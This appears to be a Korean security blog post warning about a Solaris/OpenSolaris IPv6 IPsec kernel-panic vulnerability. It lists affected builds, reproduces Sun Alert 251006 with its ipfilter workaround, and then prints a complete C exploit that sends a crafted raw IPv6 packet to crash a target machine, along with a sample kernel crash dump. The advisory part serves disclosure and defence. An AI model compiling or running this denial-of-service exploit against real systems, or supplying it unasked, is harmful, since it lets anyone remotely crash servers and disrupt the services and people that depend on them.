Sun Solaris IPv6 'ipsec_needs_processing_v6()' Remote Denial of Service Vulnerability

솔라리스 시스템에 대한 IPv6 ipsec 관련 제로데이 공격 코드가 공개 되었습니다.

현재 sun 에서 공식적인 패치가 나오지 않은 상태 입니다.

아래에 해당 하는 버전들이 취약하니 각별히 유의하시기 바랍니다.

Sun SunOS 5.11
Sun Solaris 11
Sun Solaris 10.0_x86
Sun Solaris 10
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_39
Sun OpenSolaris build snv_36
Sun OpenSolaris build snv_29
Sun OpenSolaris build snv_22
Sun OpenSolaris build snv_19
Sun OpenSolaris build snv_13
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100
Sun OpenSolaris build snv_02
Sun OpenSolaris build snv_01


해당 버전들은 원격에서 서비스 거부 공격을 당할 수 있는 위협에 노출되어 있습니다.

대안은 해당 버전들의 업그레이드 버전을 사용해야 합니다.

하단의 내용을 참고하시기 바랍니다.
http://sunsolve.sun.com/search/document.do?assetkey=1-66-251006-1
위 링크의 내용 전문은 아래와 같습니다.

Document Audience:	PUBLIC
Document ID:	251006
Title:	A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic
Copyright Notice:	Copyright © 2009 Sun Microsystems, Inc. All Rights Reserved
Update Date:	Tue Jan 27 00:00:00 MST 2009

---

Solution Type Sun Alert

Solution  251006 :   A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic  

Related Categories

Home>Content>Sun Alert Criteria Categories>Security   Home>Content>Sun Alert Release Phase>Workaround

Bug ID

6797796

Product

Solaris 10 Operating System

OpenSolaris

Date of Workaround Release

27-Jan-2009

SA Document Body

A Security Vulnerability in Solaris IPv6 Implementation (ip6(7p)) May Cause a System Panic

1. Impact

An insufficient validation security vulnerability in the Solaris IPv6 implementation (ip6(7p)) may allow a remote privileged user to panic the system using a crafted packet.  This is a type of Denial of Service (DoS).

2. Contributing Factors

This issue can occur in the following releases:

SPARC Platform:

• Solaris 10
• OpenSolaris based upon builds snv_01 through snv_107
  

x86 Platform:

• Solaris 10
• OpenSolaris based upon builds snv_01 through snv_107

Notes:

1. Solaris 8 and Solaris 9 are not affected by this issue.

2. This issue only affects systems which have at least one IPv6 interface configured and "up".

The ifconfig(1M) command can be used to list all IPv6 interfaces configured and "up" on the system as follows:

$ ifconfig -au6 

Solaris 10 does not have a default IPv6 interface configured since administrators are required to enable or disable IPv6 at install time.

3. OpenSolaris distributions may include additional bug fixes above and beyond the base build from which it was derived. The base build can be derived as follows:

$ uname -v

snv_86

3. Symptoms

If the described issue occurs, the following panic string and stack trace may be seen:

ipsec_needs_processing_v6

ipsec_needs_processing_v6 ()

ipsec_early_ah_v6 ()

ip_rput_data_v6 ()

ip_rput_v6 ()

putnext ()

dld_str_rx_fastpath ()

i_dls_link_rx ()

...

4. Workaround

Malformed packets can be blocked to prevent this issue from occurring using Solaris IP Filter (ipfilter(5)) with the following rule:

block in quick all with short

Please refer to ipf(1M) and ipf(4) for enabling and configuring ipfilter.

If an IPv6 interface is configured but not being used, then disabling the IPv6 interface will also prevent this issue from occurring on the system.

To disable all IPv6 interfaces on a system, following command can be run as root:

# ifconfig -a6 down

The following Interim Security Relief (ISRs) are available from http://www.sunsolve.sun.com/tpatches

SPARC Platform

• Solaris 10 IDR140811-01

x86 Platform

• Solaris 10 IDR140812-01

Note: This document refers to one or more Interim Security Relief (ISRs) which are designed to address the concerns identified herein. Sun has limited experience with these (ISRs) due to their interim nature. As such, you should only install the ISRs on systems meeting the configurations described above. Sun may release full patches at a later date, however, Sun is under no obligation whatsoever to create, release, or distribute any such patch.

5. Resolution

This issue is addressed in the following releases:

SPARC Platform

• OpenSolaris based upon builds snv_108 or later

x86 Platform:

• OpenSolaris based upon builds snv_108 or later

A final resolution is pending completion for Solaris 10.

For more information on Security Sun Alerts, see Technical Instruction ID 213557.

This Sun Alert notification is being provided to you on an "AS IS" basis. This Sun Alert notification may contain information provided by third parties. The issues described in this Sun Alert notification may or may not impact your system(s). Sun makes no representations, warranties, or guarantees as to the information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. This Sun Alert notification contains Sun proprietary and confidential information. It is being provided to you pursuant to the provisions of your agreement to purchase services from Sun, or, if you do not have such an agreement, the Sun.com Terms of Use. This Sun Alert notification may only be used for the purposes contemplated by these agreements.

Copyright 2000-2009 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 U.S.A. All rights reserved.

Attachments

This solution has no attachment

또한 공격 코드는 아래와 같습니다.

/*

	SunOS Release 5.11 Version snv_101b Remote IPV6 

	Kernel Crash Exploit 0day

	By Kingcope/2009

*/


#include <stdio.h>

#include <string.h>

#include <stdlib.h>

#include <netinet/in.h>

#include <netdb.h>

#include <sys/time.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <arpa/inet.h>

#include <unistd.h>


unsigned char rawData[] =

"\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"

"\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"

"\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";


int main(int argc, char *argv[])

{

  struct sockaddr_in6 dst;

  int s;


  if (argc < 2)

  {

    printf("SunOS Release 5.11 Version snv_101b Remote IPV6 Kernel Crash Exploit 0day By Kingcope/2009\n");

    printf("Usage: %s <dst>\n", *argv);

    return(1);

  }


  memset(&dst, 0, sizeof(dst));

  if (inet_pton(AF_INET6, (char *)argv[1], (struct in6_addr *) &dst.sin6_addr) != 1) {

	printf("Error: inet_pton()\n");

	exit(-1);

	}

	memcpy(rawData+24, &dst.sin6_addr, 16);


  dst.sin6_family = AF_INET6;


  s = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW);

  if (s == -1)

    return(1);


  printf("Sending IPV6 packet: %s\n", argv[1]);


  if (sendto(s,&rawData,sizeof(rawData),0,(struct sockaddr*)&dst,sizeof(dst)) == -1)

  {

	perror("Error sending packet");

	exit(-1);

  }


  return(0);

}


/*

Kernel Crash Dump May Look Like The Following Snippet

[ID 965332 kern.notice] ipsec_needs_processing_v6

[ID 100000 kern.notice]

[ID 655072 kern.notice] ffffff00012b9650 ip:ipsec_needs_processing_v6+10c ()

[ID 655072 kern.notice] ffffff00012b96f0 ip:ipsec_early_ah_v6+75 ()

[ID 655072 kern.notice] ffffff00012b9860 ip:ip_rput_data_v6+f4e ()

[ID 655072 kern.notice] ffffff00012b9940 ip:ip_rput_v6+64e ()

[ID 655072 kern.notice] ffffff00012b99b0 unix:putnext+21e ()

[ID 655072 kern.notice] ffffff00012b9a00 dld:dld_str_rx_fastpath+8a ()

[ID 655072 kern.notice] ffffff00012b9ad0 dls:i_dls_link_rx+2c7 ()

[ID 655072 kern.notice] ffffff00012b9b50 mac:mac_do_rx+b7 ()

[ID 655072 kern.notice] ffffff00012b9b80 mac:mac_rx+1f ()

[ID 655072 kern.notice] ffffff00012b9bd0 e1000g:e1000g_intr+135 ()

[ID 655072 kern.notice] ffffff00012b9c20 unix:av_dispatch_autovect+7c ()

[ID 655072 kern.notice] ffffff00012b9c60 unix:dispatch_hardint+33 ()

[ID 655072 kern.notice] ffffff00012c5870 unix:switch_sp_and_call+13 ()

[ID 655072 kern.notice] ffffff00012c58c0 unix:do_interrupt+9e ()

[ID 655072 kern.notice] ffffff00012c58d0 unix:cmnint+ba ()

[ID 655072 kern.notice] ffffff00012c5a00 unix:ddi_mem_putb+f ()

[ID 655072 kern.notice] ffffff00012c5a40 ata:ata_disk_start_dma_out+88 ()

[ID 655072 kern.notice] ffffff00012c5a90 ata:ata_ctlr_fsm+1fb ()

[ID 655072 kern.notice] ffffff00012c5af0 ata:ata_hba_start+84 ()

[ID 655072 kern.notice] ffffff00012c5b30 ata:ghd_waitq_process_and_mutex_hold+df ()

[ID 655072 kern.notice] ffffff00012c5ba0 ata:ghd_intr+8d ()

[ID 655072 kern.notice] ffffff00012c5bd0 ata:ata_intr+27 ()

[ID 655072 kern.notice] ffffff00012c5c20 unix:av_dispatch_autovect+7c ()

[ID 655072 kern.notice] ffffff00012c5c60 unix:dispatch_hardint+33 ()

[ID 655072 kern.notice] ffffff0001205ab0 unix:switch_sp_and_call+13 ()

[ID 655072 kern.notice] ffffff0001205b00 unix:do_interrupt+9e ()

[ID 655072 kern.notice] ffffff0001205b10 unix:cmnint+ba ()

[ID 655072 kern.notice] ffffff0001205c00 unix:mach_cpu_idle+b ()

[ID 655072 kern.notice] ffffff0001205c40 unix:cpu_idle+17b ()

[ID 655072 kern.notice] ffffff0001205c60 unix:idle+4c ()

[ID 655072 kern.notice] ffffff0001205c70 unix:thread_start+8 ()

[ID 100000 kern.notice]

[ID 672855 kern.notice] syncing file systems...

[ID 904073 kern.notice]  done

[ID 111219 kern.notice] dumping to /dev/zvol/dsk/rpool/dump, offset 65536, content: kernel

[ID 409368 kern.notice] ^M100% done: 56726 pages dumped, compression ratio 3.59,

[ID 851671 kern.notice] dump succeeded

[ID 540533 kern.notice] ^MSunOS Release 5.11 Version snv_101b 64-bit

[ID 172908 kern.notice] Copyright 1983-2008 Sun Microsystems, Inc.  All rights reserved.

*/